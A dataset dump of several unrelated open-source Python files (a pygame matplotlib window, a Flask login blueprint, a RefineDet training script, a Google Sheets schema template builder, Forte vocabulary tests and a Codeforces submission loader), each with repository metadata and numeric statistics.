| 0.046186
| 0.017137
| 0
| 0
| 0.002978
| 0.263294
| 7,748
| 228
| 106
| 33.982456
| 0.835319
| 0.141585
| 0
| 0.125
| 0
| 0
| 0.208548
| 0.026675
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072368
| false
| 0
| 0.052632
| 0
| 0.164474
| 0.013158
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af4465eb1740d25f4243ab38dfe29940e3f43d6f
| 1,508
|
py
|
Python
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | 3
|
2021-12-13T17:56:15.000Z
|
2022-03-03T21:00:24.000Z
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | 1
|
2021-11-28T12:02:52.000Z
|
2021-12-21T09:04:41.000Z
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | null | null | null |
"""Contain a window with a plot for pygame_gui."""
from typing import Union
import pygame
import pygame_gui
from pygame_gui.core.interfaces.manager_interface import IUIManagerInterface
from pygame_gui.core.ui_element import ObjectID
from .backend_pygame import FigureSurface
import matplotlib
matplotlib.use("module://pygame_matplotlib.backend_pygame")
class UIPlotWindow(pygame_gui.elements.ui_window.UIWindow):
def __init__(
self,
rect: pygame.Rect,
manager: IUIManagerInterface,
figuresurface: FigureSurface,
window_display_title: str = "",
element_id: Union[str, None] = None,
object_id: Union[ObjectID, str, None] = None,
resizable: bool = False,
visible: int = 1,
):
self.figuresurf = figuresurface
super().__init__(
rect,
manager,
window_display_title=window_display_title,
element_id=element_id,
object_id=object_id,
resizable=resizable,
visible=visible,
)
def set_dimensions(self, *args, **kwargs):
super().set_dimensions(*args, **kwargs)
print("setting dimensions")
# Update the size of the figure with the new bounding rectangle
self.figuresurf.set_bounding_rect(self.get_container().get_rect())
self.update_window_image()
def update_window_image(self):
# Update the image of the container
self.get_container().set_image(self.figuresurf)
| 31.416667
| 76
| 0.670424
| 172
| 1,508
| 5.627907
| 0.372093
| 0.046488
| 0.055785
| 0.035124
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000878
| 0.244695
| 1,508
| 47
| 77
| 32.085106
| 0.84899
| 0.093501
| 0
| 0
| 0
| 0
| 0.043382
| 0.030147
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0
| 0.189189
| 0
| 0.297297
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af454b0c2f018d2a6fb480e99014829738475907
| 955
|
py
|
Python
|
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
from flask import Blueprint,render_template,flash,url_for,redirect
from simpledu.models import Course
from simpledu.forms import LoginForm,RegisterForm
from flask_login import login_user
front = Blueprint('front',__name__)
@front.route('/')
def index():
courses = Course.query.all()
return render_template('index.html',courses=courses)
@front.route('/login')
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
login_user(user,form.remember_me.data)
return redirect(url_for('.index'))
return render_template('login.html',form=form)
@front.route('/register',methods=['GET','POST'])
def register():
form = RegisterForm()
if form.validate_on_submit():
form.create_user()
flash('register success!please login','success')
return redirect(url_for('.login'))
return render_template('register.html',form=form)
| 31.833333
| 66
| 0.710995
| 123
| 955
| 5.349594
| 0.382114
| 0.085106
| 0.091185
| 0.048632
| 0.066869
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149738
| 955
| 29
| 67
| 32.931034
| 0.810345
| 0
| 0
| 0.08
| 0
| 0
| 0.114136
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.16
| 0
| 0.48
| 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af456070653a62afea1b52eac295ba59531bc4a5
| 6,151
|
py
|
Python
|
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
import argparse
import numpy as np
import os
from os import path
import tensorflow as tf
from tensorflow.keras.callbacks import ModelCheckpoint
from models import RefineDetVGG16
from utils import read_jpeg_image, resize_image_and_boxes, absolute2relative
from saffran.saffran_data_loader import load_saffran_dataset
from saffran.augmentations import Augmentation
from saffran.config import IMAGE_SIZE, BATCH_SIZE, SHUFFLE_BUFFER, NUM_CLASS, LR_SCHEDULE, MOMENTUM, NUM_EPOCHS, STEPS_PER_EPOCH
parser = argparse.ArgumentParser()
parser.add_argument('--saffran_root', type=str, default='./data/Saffron_Dataset/Labeled/',
help='Path to the VOCdevkit directory.')
parser.add_argument('--checkpoint', type=str, default=None,
help='Path to the weights file, in the case of resuming training.')
parser.add_argument('--initial_epoch', type=int, default=0,
help='Starting epoch. Give a value bigger than zero to resume training.')
parser.add_argument('--batch_size', type=int, default=None,
help='Useful for quick tests. If not provided, the value in the config file is used instead.')
args = parser.parse_args()
BATCH_SIZE = args.batch_size or BATCH_SIZE
def build_dataset(img_paths, bboxes, repeat=False, shuffle=False,
drop_remainder=False, augmentation_fn=None):
row_lengths = [len(img_bboxes) for img_bboxes in bboxes]
bboxes_concat = np.concatenate(bboxes, axis=0)
bboxes = tf.RaggedTensor.from_row_lengths(values=bboxes_concat,
row_lengths=row_lengths)
dataset = tf.data.Dataset.from_tensor_slices((img_paths, bboxes))
if repeat:
dataset = dataset.repeat()
if shuffle:
dataset = dataset.shuffle(len(img_paths),
reshuffle_each_iteration=True)
dataset = dataset.map(lambda img_path, boxes:
(read_jpeg_image(img_path), boxes))
if augmentation_fn:
dataset = dataset.map(augmentation_fn)
dataset = dataset.map(lambda image, boxes:
resize_image_and_boxes(image, boxes, IMAGE_SIZE))
dataset = dataset.map(lambda image, boxes:
(image, absolute2relative(boxes, tf.shape(image))))
# This hack is to allow batching into ragged tensors
dataset = dataset.map(lambda image, boxes:
(image, tf.expand_dims(boxes, 0)))
dataset = dataset.map(lambda image, boxes:
(image, tf.RaggedTensor.from_tensor(boxes)))
dataset = dataset.batch(BATCH_SIZE, drop_remainder=drop_remainder)
dataset = dataset.map(lambda image, boxes:
(image, boxes.merge_dims(1, 2)))
return dataset
train_img_paths, train_bboxes = load_saffran_dataset(dataroot=args.saffran_root)
print('INFO: Loaded %d training samples' % len(train_img_paths))
# Classes starts at 0
for i in train_bboxes:
i[:,-1] = i[:,-1] -1
train_data = build_dataset(train_img_paths, train_bboxes,
repeat=True, shuffle=True, drop_remainder=True,
augmentation_fn=Augmentation())
print(train_data)
print('INFO: Instantiating model...')
model = RefineDetVGG16(num_classes=NUM_CLASS,aspect_ratios=[1.0])
model.build(input_shape=(BATCH_SIZE, IMAGE_SIZE[0], IMAGE_SIZE[1], 3))
if args.checkpoint:
model.load_weights(args.checkpoint)
else:
model.base.load_weights(
path.join('weights', 'VGG_ILSVRC_16_layers_fc_reduced.h5'), by_name=True)
lr_scheduler = tf.keras.optimizers.schedules.PiecewiseConstantDecay(*LR_SCHEDULE)
optimizer = tf.keras.optimizers.SGD(lr_scheduler, momentum=MOMENTUM)
optimizer.iterations = tf.Variable(STEPS_PER_EPOCH * args.initial_epoch)
print('Trainint at learning rate =', optimizer._decayed_lr(tf.float32))
model.compile(optimizer=optimizer)
os.makedirs('weights', exist_ok=True)
callbacks = [
ModelCheckpoint(path.join('weights', 'refinedet_vgg16_{epoch:0d}.h5'),
monitor='total_loss')
]
history = model.fit(train_data, epochs=NUM_EPOCHS, steps_per_epoch=STEPS_PER_EPOCH,
initial_epoch=args.initial_epoch, callbacks=callbacks)
import cv2
import matplotlib.pyplot as plt
def sind(x):
return np.sin(x / 180*np.pi)
def cosd(x):
return np.cos(x / 180*np.pi)
def draw_line_segment(image, center, angle, color, length=40, thickness=3):
x1 = center[0] - cosd(angle) * length / 2
x2 = center[0] + cosd(angle) * length / 2
y1 = center[1] - sind(angle) * length / 2
y2 = center[1] + sind(angle) * length / 2
cv2.line(image, (int(x1 + .5), int(y1 + .5)), (int(x2 + .5), int(y2 + .5)), color, thickness)
def draw_ouput_lines(centers_box,test,print_conf=False,resize=False):
out = []
if resize:
test = cv2.resize(test,resize)
SIZE2,SIZE1 = resize
else:
SIZE1,SIZE2 = 640,640
if print_conf:
print(centers_box[:,-1])
for i in centers_box:
cx = i[0] * SIZE2
cy = i[1] * SIZE1
label = i[-2]
confidence = i[-1]
angle = np.arccos(label/NUM_CLASS)*(180/np.pi)
draw_line_segment(test,(cx,cy),angle,(255,255,0))
out.append('{} {} {} {}'.format(str(cx),str(cy),str(angle),str(confidence)))
plt.figure(figsize=(10,10))
plt.imshow(test)
plt.show()
return out
SIZE=640
test_dir = 'data/Saffron_Dataset/Test/' # CHANGE HERE TO CHANGE TEST DIRECTORY
test_images = os.listdir(test_dir)
for img_name in test_images:
if img_name.endswith('.txt'):
continue
img = cv2.imread(test_dir+img_name)
img = img.astype(np.float64)
org_shape = img.shape
img = cv2.resize(img,(SIZE,SIZE))
img = np.expand_dims(img,0)
out_boxes = model(img,decode=True)
nms_box = NMS(out_boxes[0],top_k=500,nms_threshold=0.1)
centers_box = minmax2xywh(nms_box)
out = draw_ouput_lines(centers_box,img[0].astype(np.uint8),False,resize=org_shape[:2][::-1])
out = '\n'.join(out)
with open(test_dir + img_name.split('.')[0]+'.txt','w') as f:
f.write(out)
| 35.761628
| 128
| 0.667859
| 840
| 6,151
| 4.709524
| 0.310714
| 0.035389
| 0.030081
| 0.034884
| 0.126896
| 0.086704
| 0.039434
| 0.020222
| 0
| 0
| 0
| 0.02316
| 0.213786
| 6,151
| 172
| 129
| 35.761628
| 0.794872
| 0.017396
| 0
| 0.054264
| 0
| 0
| 0.092053
| 0.019868
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03876
| false
| 0
| 0.100775
| 0.015504
| 0.170543
| 0.054264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af4ba5a904905887481da5fbd8875608d26d4c5d
| 7,649
|
py
|
Python
|
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | null | null | null |
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | 3
|
2021-02-09T14:57:00.000Z
|
2021-09-27T23:23:45.000Z
|
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | 1
|
2022-02-23T14:21:17.000Z
|
2022-02-23T14:21:17.000Z
|
import argparse
import gspread
import json
import lattice
import requests
import string
import sys
from collections import OrderedDict
from gspread_formatting import *
from oauth2client.service_account import ServiceAccountCredentials
from urllib.parse import urljoin
def getArgs():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('-t','--type',
help="the object type to return a template for")
parser.add_argument('-m','--mode',
help="the server to look-up schema, if not local")
parser.add_argument('-c','--creds',
help="the location of google drive client_secret.json file")
parser.add_argument('-s','--sheet',
help="the key for the google sheet")
args = parser.parse_args()
return args
args = getArgs()
if not args.type:
sys.exit('ERROR: --type is required')
if not args.creds:
sys.exit('ERROR: --creds is required')
if not args.sheet:
sys.exit('ERROR: --sheet is required')
if not args.mode:
sys.exit('ERROR: --mode is required')
schema_name = args.type
# follow instructions here to enable API & generate credentials
# https://www.twilio.com/blog/2017/02/an-easy-way-to-read-and-write-to-a-google-spreadsheet-in-python.html
creds = ServiceAccountCredentials.from_json_keyfile_name(args.creds, 'https://www.googleapis.com/auth/drive')
client = gspread.authorize(creds)
sheet = client.open_by_key(args.sheet)
for tab in sheet.worksheets():
if tab.title == schema_name:
sheet.del_worksheet(tab)
tab = sheet.add_worksheet(title=schema_name,rows='100',cols='52')
abcs = string.ascii_uppercase
cell_grid = list(abcs) + ['A' + i for i in abcs]
connection = lattice.Connection(args.mode)
server = connection.server
# grab the OntologyTerm term_name & term_id schemas to put in places that linkTo OntologyTerm
ont_schema_url = urljoin(server, 'profiles/ontology_term/?format=json')
ont_schema = requests.get(ont_schema_url).json()
term_id_props = ont_schema['properties']['term_id']
term_name_props = ont_schema['properties']['term_name']
# grab all of the submittable properties
props = {}
schema_url = urljoin(server, 'profiles/' + schema_name + '/?format=json')
schema = requests.get(schema_url).json()
for p in schema['properties'].keys():
props[p] = schema['properties'][p]
ordered_props = OrderedDict(props)
# grab all of the properties of subobjects
subprops = {}
non_submit = [] # collect the base property so we can grey it out in favor of the subproperties
for p in props.keys():
if props[p]['type'] == 'object' or \
(props[p]['type'] == 'array' and props[p]['items']['type'] == 'object'):
subprops[p] = props[p]
ordered_props.pop(p)
non_submit.append(p)
if props[p]['type'] == 'array':
for sp in props[p]['items']['properties'].keys():
if props[p]['items']['properties'][sp]['type'] == 'object' or \
(props[p]['items']['properties'][sp]['type'] == 'array' and props[p]['items']['properties'][sp]['items']['type'] == 'object'):
subprops[p + '.' + sp] = props[p]['items']['properties'][sp]
non_submit.append(p + '.' + sp)
if props[p]['items']['properties'][sp]['type'] == 'array':
for ssp in props[p]['items']['properties'][sp]['items']['properties'].keys():
subprops[p + '.' + sp + '.' + ssp] = props[p]['items']['properties'][sp]['items']['properties'][ssp]
else:
for ssp in props[p]['items']['properties'][sp]['items']['properties'].keys():
subprops[p + '.' + sp + '.' + ssp] = props[p]['items']['properties'][sp]['properties'][ssp]
else:
subprops[p + '.' + sp] = props[p]['items']['properties'][sp]
else:
my_props = props[p]['properties']
for sp in my_props.keys():
subprops[p + '.' + sp] = my_props[sp]
ordered_props.update(subprops)
remove_props = []
ont_props = []
for p in ordered_props.keys():
if str(ordered_props[p].get('comment')).startswith('Do not submit') \
or ordered_props[p].get('notSubmittable') == True:
remove_props.append(p)
if p in non_submit:
non_submit.remove(p)
elif ordered_props[p].get('linkTo') == 'OntologyTerm':
remove_props.append(p)
ont_props.append(p)
for p in remove_props:
del ordered_props[p]
for p in ont_props:
ordered_props[p + '.term_id'] = term_id_props
ordered_props[p + '.term_name'] = term_name_props
non_submit_col = []
for p in non_submit:
non_submit_col.append(cell_grid[list(ordered_props.keys()).index(p) + 1])
# collect required fields & move fields to the front
req_props = []
if schema.get('required'):
req_count = 0
req_props = schema['required']
for i in req_props:
if i in ordered_props:
ordered_props.move_to_end(i, False)
req_count += 1
else:
ordered_props.move_to_end(i + '.term_id', False)
ordered_props.move_to_end(i + '.term_name', False)
req_count += 2
# get the required field columns so we can color them later
req_columns = []
if req_props:
if 'aliases' in ordered_props.keys():
ordered_props.move_to_end('aliases', False)
req_start_col = 'C'
req_stop_col = cell_grid[req_count + 1]
else:
req_start_col = 'B'
req_stop_col = cell_grid[req_count]
req_columns = ':'.join([req_start_col, req_stop_col])
# list the attributes we want to know about each property
descriptor_list = [
'title',
'description',
'comment',
'type',
'linkTo',
'enum'
]
uber_list = []
# gather the top row list of schema_version followed by the property names
schema_version = schema['properties']['schema_version']['default']
prop_list = ['schema_version=' + schema_version]
for p in ordered_props.keys():
prop_list.append(p)
uber_list.append(prop_list)
# gather the attributes of each property
for descriptor in descriptor_list:
this_list = ['#' + descriptor]
for p in ordered_props.keys():
if ordered_props[p]['type'] == 'array' and descriptor in ['type','enum','linkTo']:
if ordered_props[p]['items'].get(descriptor):
this_list.append('array of ' + str(ordered_props[p]['items'].get(descriptor,'')))
else:
this_list.append('')
else:
this_list.append(str(ordered_props[p].get(descriptor,'')))
uber_list.append(this_list)
# write the whole thing to the google sheet
tab.update('A1',uber_list)
# bold the first column
tab.format('A:A', {'textFormat': {'bold': True}})
# set the whole sheet to clip text
tab.format('A1:AZ100',{'wrapStrategy': 'CLIP'})
# set cell validation in the first input row for all boolean fields or fields with an enum list
count = 0
for p in ordered_props.keys():
count += 1
if ordered_props[p].get('enum') or ordered_props[p].get('type') == 'boolean':
col = cell_grid[count]
cell_to_format = col + str(len(descriptor_list) + 2) + ':' + col + '100'
validation_rule = DataValidationRule(BooleanCondition('ONE_OF_LIST',
ordered_props[p].get('enum', ['TRUE','FALSE'])),
showCustomUi=True)
set_data_validation_for_cell_range(tab, cell_to_format, validation_rule)
# aliases should be the first property listed, so freeze that column and the descriptor column
if ordered_props.get('aliases'):
set_frozen(tab, rows=len(descriptor_list) + 1, cols=2)
else: #if no aliases propertry, then just freeze the descriptor column
set_frozen(tab, rows=len(descriptor_list) + 1, cols=1)
# shade all of the columns with required properties
if req_columns:
green = color(0.58, 0.77, 0.49)
format_cell_range(tab, req_columns, cellFormat(backgroundColor=green))
# for the properties with embedded objects, shade the non-submittable property
for column in non_submit_col:
grey = color(0.85, 0.85, 0.85)
format_cell_range(tab, column, cellFormat(backgroundColor=grey))
| 35.576744
| 130
| 0.697085
| 1,127
| 7,649
| 4.574978
| 0.221828
| 0.036074
| 0.029868
| 0.044802
| 0.242824
| 0.155935
| 0.11249
| 0.061676
| 0.048487
| 0.033747
| 0
| 0.007697
| 0.150739
| 7,649
| 214
| 131
| 35.742991
| 0.786022
| 0.152569
| 0
| 0.104651
| 0
| 0
| 0.173011
| 0.005416
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005814
| false
| 0
| 0.063953
| 0
| 0.075581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af4fa2ce445c7c2f288125fe751a69825469c270
| 8,191
|
py
|
Python
|
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Forte Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle as pkl
import unittest
from itertools import product
from ddt import ddt, data, unpack
from asyml_utilities.special_tokens import SpecialTokens
from forte.common import InvalidOperationException
from forte.data import dataset_path_iterator
from forte.data.vocabulary import Vocabulary, FrequencyVocabFilter
@ddt
class VocabularyTest(unittest.TestCase):
def setUp(self):
self.data_path = os.path.abspath(
os.path.join(
os.path.dirname(__file__),
"../../../",
"data_samples",
"random_texts",
)
)
def argmax(self, one_hot):
idx = -1
for i, flag in enumerate(one_hot):
if flag:
self.assertTrue(idx == -1)
idx = i
return idx
def test_vocabulary(self):
methods = ["indexing", "one-hot"]
flags = [True, False]
for method, need_pad, use_unk in product(methods, flags, flags):
# As stated here: https://github.com/python/typing/issues/511
# If we use the generic type here we cannot pickle the class
# in python 3.6 or earlier (the issue is fixed in 3.7).
# So here we do not use the type annotation for testing.
vocab = Vocabulary(method=method, use_pad=need_pad, use_unk=use_unk)
# Check vocabulary add_element, element2repr and id2element
elements = [
"EU",
"rejects",
"German",
"call",
"to",
"boycott",
"British",
"lamb",
".",
]
for ele in elements:
vocab.add_element(ele)
save_len = len(vocab)
for ele in elements:
vocab.add_element(ele)
self.assertEqual(save_len, len(vocab))
representation = [vocab.element2repr(ele) for ele in elements]
self.assertTrue(len(representation) > 0)
if method == "indexing":
self.assertTrue(isinstance(representation[0], int))
else:
self.assertTrue(isinstance(representation[0], list))
recovered_elements = []
for rep in representation:
if method == "indexing":
idx = rep
else:
idx = self.argmax(rep)
recovered_elements.append(vocab.id2element(idx))
self.assertListEqual(elements, recovered_elements)
# Check __len__, items.
self.assertEqual(
len(set(elements)) + int(use_unk) + int(need_pad), len(vocab)
)
saved_len = len(vocab)
# Check has_element
for ele in elements:
self.assertTrue(vocab.has_element(ele))
for ele in range(10):
self.assertFalse(vocab.has_element(ele))
# check PAD_ELEMENT
if need_pad:
if method == "indexing":
expected_pad_repr = 0
else:
expected_pad_repr = [0] * (len(vocab) - 1)
self.assertEqual(
expected_pad_repr, vocab.element2repr(SpecialTokens.PAD)
)
# Check UNK_ELEMENT
if use_unk:
if method == "indexing":
expected_unk_repr = 0 + int(need_pad)
else:
expected_unk_repr = [0] * (len(vocab) - int(need_pad))
expected_unk_repr[0] = 1
self.assertEqual(
expected_unk_repr, vocab.element2repr(SpecialTokens.UNK)
)
self.assertEqual(
expected_unk_repr, vocab.element2repr("random_element")
)
self.assertEqual(saved_len, len(vocab))
# Check state
new_vocab = pkl.loads(pkl.dumps(vocab))
self.assertEqual(vocab.method, new_vocab.method)
self.assertEqual(vocab.use_pad, new_vocab.use_pad)
self.assertEqual(vocab.use_unk, new_vocab.use_unk)
self.assertEqual(vocab._element2id, new_vocab._element2id)
self.assertEqual(vocab._id2element, new_vocab._id2element)
self.assertEqual(vocab.next_id, new_vocab.next_id)
# These cases correspond to different combinations of PAD and UNK, and
# whether we have additional specials.
@data(
(True, False, ["cls", "blah"]),
(False, False, ["cls", "blah"]),
(False, True, ["cls", "blah"]),
(False, False, ["cls", "blah"]),
(True, False, None),
(False, False, None),
(False, True, None),
(False, False, None),
)
@unpack
def test_freq_filtering(self, need_pad, use_unk, special_tokens):
base_vocab = Vocabulary(
use_pad=need_pad, use_unk=use_unk, special_tokens=special_tokens
)
for p in dataset_path_iterator(self.data_path, ".txt"):
with open(p) as f:
for line in f:
for w in line.strip().split():
base_vocab.add_element(w)
vocab_filter = FrequencyVocabFilter(
base_vocab, min_frequency=2, max_frequency=4
)
filtered = base_vocab.filter(vocab_filter)
for e, eid in base_vocab.vocab_items():
if base_vocab.is_special_token(eid):
# Check that the filtered vocab have all special elements.
self.assertTrue(filtered.has_element(e))
else:
base_count = base_vocab.get_count(e)
if 2 <= base_count <= 4:
self.assertTrue(filtered.has_element(e))
self.assertEqual(base_count, filtered.get_count(e))
else:
self.assertFalse(filtered.has_element(e))
self.assertEqual(
len(base_vocab._element2id), len(base_vocab._id2element)
)
@data(
("indexing", 0, 2),
("one-hot", [1, 0, 0, 0, 0], [0, 0, 1, 0, 0]),
)
@unpack
def test_custom_vocab(self, method, expected_pad_value, expected_unk_value):
vocab = Vocabulary(method=method, use_pad=False, use_unk=False)
predefined = {
"[PAD]": -1,
"[CLS]": -1,
"[UNK]": -1,
"a": 2,
"b": 3,
"c": 4,
}
for e, count in predefined.items():
if count == -1:
vocab.add_special_element(e)
else:
vocab.add_element(e, count=count)
# Set the first element [PAD] to be the padding value.
vocab.mark_special_element(0, "PAD")
# Set the third element [UNK] to be the unknown value.
vocab.mark_special_element(2, "UNK")
# Check that padding values are the same as the expected representation.
self.assertEqual(vocab.get_pad_value(), expected_pad_value)
self.assertEqual(vocab.element2repr("[PAD]"), expected_pad_value)
# Check that unknown words are mapped to expected representation.
self.assertEqual(
vocab.element2repr("something else"), expected_unk_value
)
for i in [0, 1, 2]:
self.assertTrue(vocab.is_special_token(i))
with self.assertRaises(InvalidOperationException):
vocab.get_count(i)
if __name__ == "__main__":
unittest.main()
| 35.613043
| 80
| 0.561104
| 921
| 8,191
| 4.823018
| 0.263844
| 0.057407
| 0.040522
| 0.011706
| 0.171319
| 0.111436
| 0.047726
| 0.026565
| 0
| 0
| 0
| 0.013395
| 0.343792
| 8,191
| 229
| 81
| 35.768559
| 0.813023
| 0.165425
| 0
| 0.189349
| 0
| 0
| 0.034093
| 0
| 0
| 0
| 0
| 0
| 0.171598
| 1
| 0.029586
| false
| 0
| 0.053254
| 0
| 0.094675
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af54d8608e299a17c445fa8a61556df44ff6ac62
| 3,402
|
py
|
Python
|
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
scripts/crawler/sites/codeforces_loader.py
|
Takt29/CompetitiveProgrammingArena
|
7b7dfbd103b9abd6ea00156f3b7f6f2d59e40dea
|
[
"MIT"
] | null | null | null |
import sys
import json
from typing import Optional
from datetime import datetime, timezone
from .submissions_loader import Submission, SubmissionLoader, SubmissionStatus
class CodeforcesSubmissionLoader(SubmissionLoader):
def _normalize_status(self, external_status: str) -> SubmissionStatus:
patterns: list[tuple[SubmissionStatus, str]] = [
(SubmissionStatus.CompileError, 'COMPILATION_ERROR'),
(SubmissionStatus.WrongAnswer, 'WRONG_ANSWER'),
(SubmissionStatus.WrongAnswer, 'CHALLENGED'),
(SubmissionStatus.TimeLimitExceeded, 'TIME_LIMIT_EXCEEDED'),
(SubmissionStatus.MemoryLimitExceeded, 'MEMORY_LIMIT_EXCEEDED'),
(SubmissionStatus.Accepted, 'OK'),
(SubmissionStatus.RuntimeError, 'RUNTIME_ERROR'),
(SubmissionStatus.PresentationError, 'PRESENTATION_ERROR'),
(SubmissionStatus.WaitingForJudging, 'TESTING'),
(SubmissionStatus.TimeLimitExceeded, 'IDLENESS_LIMIT_EXCEEDED'),
(SubmissionStatus.WrongAnswer, 'PARTIAL'),
(SubmissionStatus.InternalError, 'CRASHED'),
]
for pattern in patterns:
if pattern[1] == external_status:
return pattern[0]
print('Unknown Status(Codeforces):', external_status, file=sys.stderr)
return SubmissionStatus.Unknown
def _get(self, since: Optional[datetime] = None) -> list[Submission]:
url = 'http://codeforces.com/api/problemset.recentStatus'
result: list[Submission] = []
submissions_json = self._request(f'{url}?count=1000')
submissions = json.loads(submissions_json)['result']
# 古い順
for submission in reversed(submissions):
user_id = submission['author']['members'][0]['handle']
contest_id = str(submission['problem']['contestId'])
task_id = submission['problem']['index']
submission_id = int(submission['id'])
timestamp = int(submission['creationTimeSeconds'])
status = submission['verdict'] if 'verdict' in submission else ''
score = 1 if self._normalize_status(
status) == SubmissionStatus.Accepted else 0
language = submission['programmingLanguage']
memory = submission['memoryConsumedBytes']
exec_time = submission['timeConsumedMillis']
code_size = 0
data = Submission(
id=submission_id,
external_user_id=user_id,
external_contest_id=f'codeforces:{contest_id}',
score=score,
status=self._normalize_status(status),
language=language,
external_task_id=f'codeforces:{contest_id}:{task_id}',
external_submission_id=f'codeforces:{contest_id}:{submission_id}',
submitted_at=datetime.fromtimestamp(
timestamp, tz=timezone.utc),
memory=memory,
exec_time=exec_time,
code_size=code_size
)
if data.status == SubmissionStatus.WaitingForJudging:
break
if self.latest_id and data.id <= self.latest_id:
continue
if since is not None and data.submitted_at < since:
continue
result.append(data)
return result
| 40.023529
| 82
| 0.620223
| 299
| 3,402
| 6.879599
| 0.381271
| 0.035002
| 0.042295
| 0.029169
| 0.032086
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004097
| 0.282481
| 3,402
| 84
| 83
| 40.5
| 0.838591
| 0.000882
| 0
| 0.029851
| 0
| 0
| 0.143362
| 0.040918
| 0
| 0
| 0
| 0
| 0
| 1
